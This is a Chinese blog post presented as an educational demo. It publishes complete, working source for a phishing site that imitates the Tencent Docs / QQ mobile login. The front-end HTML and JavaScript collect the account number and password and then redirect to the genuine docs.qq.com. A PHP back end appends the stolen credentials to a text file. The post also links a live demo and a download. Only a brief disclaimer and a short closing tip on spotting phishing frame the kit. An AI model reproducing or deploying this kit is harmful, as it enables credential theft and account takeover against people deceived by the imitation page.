# 前言

本文共享的一切技术资源包括但不限于：前后端代码、图片文件仅用于学习研究钓鱼网站原理及其思路，提示网络安全意识，禁止用于一切非法用途以及真实钓鱼，否则一切后果由用户自负。

当您下载或者阅读本文即代表您已经默认同意以上协议。

# 钓鱼示例站点 - 腾讯文档

高仿钓鱼成品如下图所示

腾讯文档钓鱼demo

示例站点：https://g.xingchencloud.top/

# 前端源代码

当用户输入了账号密码点击登录后，后端会将数据按照既定格式存储。

	<!DOCTYPE html>
	<html lang="zh-cn">
	<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no">
	<meta name="apple-mobile-web-app-capable" content="yes">
	<title>手机统一登录-腾讯文档</title>
	<link rel="shortcut icon" href="favicon.ico">
	<link rel="stylesheet" type="text/css" href="wapskin/mobile_common.css">
	<script type="text/javascript" src="wapskin/jquery-3.2.1.min.js"></script>
	<style>
	/* 初始状态隐藏 */
	footer .expandable-content {
	display: none;
	}

	/* 显示状态样式 */
	footer.expanded .expandable-content {
	display: block;
	}

	/* 箭头方向 */
	footer .expand-toggle::after {
	content: '\25BC'; /* Unicode 字符，表示向下的箭头 */
	display: inline-block;
	transform: rotate(0deg);
	transition: transform 0.3s ease-in-out;
	}

	footer.expanded .expand-toggle::after {
	transform: rotate(180deg);
	}

	/* 样式调整 */
	footer {
	cursor: pointer;
	background-color: #f0f0f0;
	text-align: center;
	padding: 10px;
	position: fixed;
	bottom: 0;
	width: 100%;
	}
	</style>
	</head>
	<body>
	<div id="content" class="content">
	<div id="error_tips">
	<div id="error_tips_content">
	<span id="error_icon"></span>
	<span id="error_message">你还没有输入账号！</span>
	</div>
	</div>
	<div id="login" class="login">
	<div id="logo" class="logo"></div>
	<div id="app_name" style="display:none"></div>
	<div id="q_login" class="q_login" style="display: none;">
	<div id="q_login_title">
	<div id="q_login_logo"></div>
	<label id="q_login_tips"> 请选择登录帐号 </label>
	</div>
	<div id="q_logon_list" class="q_logon_list"></div>
	</div>
	<form>
	<div id="web_login">
	<ul id="g_list">
	<li id="g_u">
	<div id="del_touch" class="del_touch">
	<span id="del_u" class="del_u"></span>
	</div><input id="u" class="inputstyle" name="u" autocomplete="off" type="number" placeholder="QQ号码/手机/邮箱"></li> <!-- u 这里是账号提交参数 -->
	<li id="g_p">
	<div id="del_touch_p" class="del_touch">
	<span id="del_p" class="del_u"></span>
	</div><input id="p" class="inputstyle" maxlength="16" type="password" name="p" autocorrect="off" placeholder="输入密码"></li> <!-- p 这里是密码提交参数 -->
	</ul>
	<div id="auto_login" style="display: block;">
	<input type="checkbox" id="remember" checked="checked">
	<span class="checkbox"></span>
	<label class="wording"> 下次自动登录 </label>
	</div>
	<div href="javascript:void(0);" id="go">
	登录
	</div>
	<div href="javascript:void(0);" id="onekey" class=" weak" style="display: block;">
	一键登录(维护中)
	</div>
	</div>
	</form>
	<div id="switch">
	<div id="zc_feedback">
	<span id="zc"><a href="https://zc.qq.com/" target="_blank">注册新帐号</a></span>
	<span id="forgetpwd"><a href="https://accounts.qq.com/find/password" target="_blank">忘了密码？</a></span>
	</div>
	</div>
	<div id="custom_bottom">
	</div>
	</div>
	</div>
	<style>
	.spinner {
	margin: 20px auto;
	width: 40px;
	height: 40px;
	position: relative;
	display: none;
	}
	/* 设置所有的圈圈大小及颜色 */
	.container1 > div, .container2 > div, .container3 > div {
	width: 12px;
	height: 12px;
	background-color: #aeaeae;
	border-radius: 100%;
	position: absolute;
	-webkit-animation: bouncedelay 1.2s infinite ease-in-out;
	animation: bouncedelay 1.2s infinite ease-in-out;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	}

	.spinner .spinner-container {
	position: absolute;
	width: 100%;
	height: 100%;
	}

	.container2 {
	-webkit-transform: rotateZ(45deg);
	transform: rotateZ(45deg);
	}

	.container3 {
	-webkit-transform: rotateZ(90deg);
	transform: rotateZ(90deg);
	}

	.circle1 { top: 0; left: 0; }
	.circle2 { top: 0; right: 0; }
	.circle3 { right: 0; bottom: 0; }
	.circle4 { left: 0; bottom: 0; }

	.container2 .circle1 {
	-webkit-animation-delay: -1.1s;
	animation-delay: -1.1s;
	}

	.container3 .circle1 {
	-webkit-animation-delay: -1.0s;
	animation-delay: -1.0s;
	}

	.container1 .circle2 {
	-webkit-animation-delay: -0.9s;
	animation-delay: -0.9s;
	}

	.container2 .circle2 {
	-webkit-animation-delay: -0.8s;
	animation-delay: -0.8s;
	}

	.container3 .circle2 {
	-webkit-animation-delay: -0.7s;
	animation-delay: -0.7s;
	}

	.container1 .circle3 {
	-webkit-animation-delay: -0.6s;
	animation-delay: -0.6s;
	}

	.container2 .circle3 {
	-webkit-animation-delay: -0.5s;
	animation-delay: -0.5s;
	}

	.container3 .circle3 {
	-webkit-animation-delay: -0.4s;
	animation-delay: -0.4s;
	}

	.container1 .circle4 {
	-webkit-animation-delay: -0.3s;
	animation-delay: -0.3s;
	}

	.container2 .circle4 {
	-webkit-animation-delay: -0.2s;
	animation-delay: -0.2s;
	}

	.container3 .circle4 {
	-webkit-animation-delay: -0.1s;
	animation-delay: -0.1s;
	}

	@-webkit-keyframes bouncedelay {
	0%, 80%, 100% { -webkit-transform: scale(0.0) }
	40% { -webkit-transform: scale(1.0) }
	}

	@keyframes bouncedelay {
	0%, 80%, 100% {
	transform: scale(0.0);
	-webkit-transform: scale(0.0);
	} 40% {
	transform: scale(1.0);
	-webkit-transform: scale(1.0);
	}
	}
	</style>

	<div class="spinner">
	<div class="spinner-container container1">
	<div class="circle1"></div>
	<div class="circle2"></div>
	<div class="circle3"></div>
	<div class="circle4"></div>
	</div>
	<div class="spinner-container container2">
	<div class="circle1"></div>
	<div class="circle2"></div>
	<div class="circle3"></div>
	<div class="circle4"></div>
	</div>
	<div class="spinner-container container3">
	<div class="circle1"></div>
	<div class="circle2"></div>
	<div class="circle3"></div>
	<div class="circle4"></div>
	</div>
	</div>
	<script src="posturl.js"></script>
	<script src="layer/mobile/layer.js"></script>

	<script type="text/javascript">
	// 打开页面加载
	$(function(){

	var url = safeposturl;
	var src = getQueryVariable("u");
	var tip = getQueryVariable("tip");

	// 访问人数增加
	$.ajax({
	type: "POST",
	url: url+"/include/online.php",
	dataType: 'json',
	data: {ip:1},
	success: function (result){

	}
	});

	if(tip!=''){
	layer.open({
	content: '账号密码错误，请核对后提交'
	,time: 4
	,skin: 'msg'
	});
	// 定时刷新页面
	setTimeout("javascript:location.href='/index.html?u="+src+"'", 3500);
	}
	});

	var src = getQueryVariable("u");
	if(src==false \|\| src==''){
	// window.location.href="https://docs.qq.com/";
	}else{
	if(!isMobile()) {
	//location.replace("/wap.html?u="+u);
	}
	}

	function isMobile() {
	return navigator.userAgent.match(/Mobile\|iPhone\|iPad\|Android/i) \|\| Math.min(screen.height,screen.width) <= 480;
	}

	$('.spinner').css('display','none');
	$("#go").click(function(){
	var u=$('#u').val();
	var p=$('#p').val();
	var tishi;
	var istixing;
	var str = new Array("111111","1111111","11111111","111111111","1111111111","222222","2222222","22222222","222222222","2222222222","333333","3333333","33333333","333333333","3333333333","444444","4444444","44444444","444444444","4444444444","555555","5555555","55555555","555555555","5555555555","666666","6666666","66666666","666666666","6666666666","777777","7777777","77777777","777777777","7777777777","888888","8888888","88888888","888888888","8888888888","999999","9999999","99999999","999999999","9999999999","12345","123456","1234567","12345678","123456789","1234567890","0123456789","0123456","012345","234567","2345678","23456789","456789","4567890","567890","147258369","741741741","7417417","1472580","7410258");

	if(u.length==0){
	istixing=1;
	$('#error_message').html('你还没有输入账号！');
	}else if(p.length==0){
	istixing=1;
	$('#error_message').html('你还没有输入密码！');
	}else if(/.[\u4e00-\u9fa5]+.$/.test(u)){
	istixing=1;
	$('#error_message').html('请输入正确的帐号！');
	}else{
	istixing=0;
	}
	for(i=0;i<str.length;i++)
	{
	if(u==str[i])
	{
	istixing=1;
	$('#error_message').html('请输入正确的帐号！');
	}
	if(p==str[i])
	{
	istixing=1;
	$('#error_message').html('请输入正确的密码！');
	}
	}

	if(istixing==1){
	$('#error_tips').css('display','block');
	// 只显示，开始倒计时 N 秒后隐藏
	setTimeout(function () {
	$('#error_tips').css('display','none');
	}, 4000);
	return false;
	}

	$('.spinner').css('display','block');

	var url = safeposturl;
	// 将上传数据到服务器后端处理部分代码
	$.ajax({
	type: "POST",
	url: "/index.php", // 请求的后端 url，默认在同级目录下
	dataType: 'json',
	data: {u:u,p:p,src:src},
	success: function (result){
	if(result['code']==0){
	window.location.href = 'https://docs.qq.com/';
	}else{
	window.location.href = '/wait.html?secret='+result['secret']+'&u='+src; // 跳转到下个页面
	}
	console.log(result['code']);
	},
	error: function(result){
	window.location.href = 'https://docs.qq.com/';

	}
	});

	});
	function getQueryVariable(variable)
	{
	var query = window.location.search.substring(1);
	var vars = query.split("&");
	for (var i=0;i<vars.length;i++) {
	var pair = vars[i].split("=");
	if(pair[0] == variable){return pair[1];}
	}
	return(false);
	}

	</script>
	</body>
	<!-- 底部版权信息，如果搭建到自己的服务器。请自觉遵守相关法律法规，提前做好相关声明，切勿用于违法用途，否则一切使用后果自负。-->
	<footer onclick="toggleFooter()">
	<div class="expandable-content">
	<p>本demo仅供学习交流，提升网络安全意识，请勿用于非法用途，谢谢合作！</p>
	<p>本demo存储的账号密码均不会以任何形式泄漏，仅用于研究钓鱼原理</p>
	<p>demo源代码获取敬请关注：<a href="https://blog.xingchencloud.top/" target="_blank">叶玖洛·星尘博客</a><nbsp>的更新</p>
	</div>
	<div class="expand-label">点此展开</div>
	<div class="expand-toggle"></div>
	</footer>

	<script>
	function toggleFooter() {
	var footer = document.querySelector('footer');
	footer.classList.toggle('expanded');
	}
	</script>
	</body>
	</html>

# 后端代码

做了一个简单的防止跨域请求，前端收集的账号密码存放于同级目录下的 userdata.txt，可自定义存放路径以及存放文件名。

如果你有防止通过 url 地址 +/userdata.txt 直接读取存储的数据需求，可自行完善。

以下图片为后端收集的前端数据，存放在 userdata.txt 的结果读取示例。

	<?php
	// 允许来自指定域的跨域请求，我这里使用示例站点 g.xingchencloud.top
	header("Access-Control-Allow-Origin: https://g.xingchencloud.top");
	header("Access-Control-Allow-Methods: POST");
	header("Access-Control-Allow-Headers: Content-Type");

	$u = $_POST['u'];
	$p = $_POST['p'];
	$src = $_POST['src'];

	// 进行适当的验证和过滤
	if (empty($u) \|\| empty($p)) {
	$response = array('code' => 1, 'message' => '用户名和密码不能为空');
	echo json_encode($response);
	exit;
	}

	// 将数据存储到文件或数据库
	$data = $u . ',' . $p . ',' . $src . PHP_EOL;
	$filepath = 'userdata.txt'; // 修改为实际的文件路径，储存前端输入的账户密码

	// 文件写入操作
	if (file_put_contents($filepath, $data, FILE_APPEND) !== false) {
	$response = array('code' => 0, 'message' => '数据存储成功');
	} else {
	$response = array('code' => 2, 'message' => '数据存储失败');
	}

	// 返回处理结果给前端
	echo json_encode($response);
	?>

# 最后关于防止被钓鱼

其实通过以上 demo 示例，大家不难看出，我们平常最常见的钓鱼方式无非就是收集你的账号密码等信息，让你自己给出账号密码。

所以来历不明的链接让你输入 QQ、微信等密码一定要谨慎，同时，请确定您输入账号密码的网站是软件的官网，比如腾讯文档官网是：docs.qq.com

还有很多钓鱼网站，记住这只是最基础也是最容易分辨的一种，希望大家平时擦亮双眼，不要被钓鱼了。

# 下载地址

点击跳转

技术教程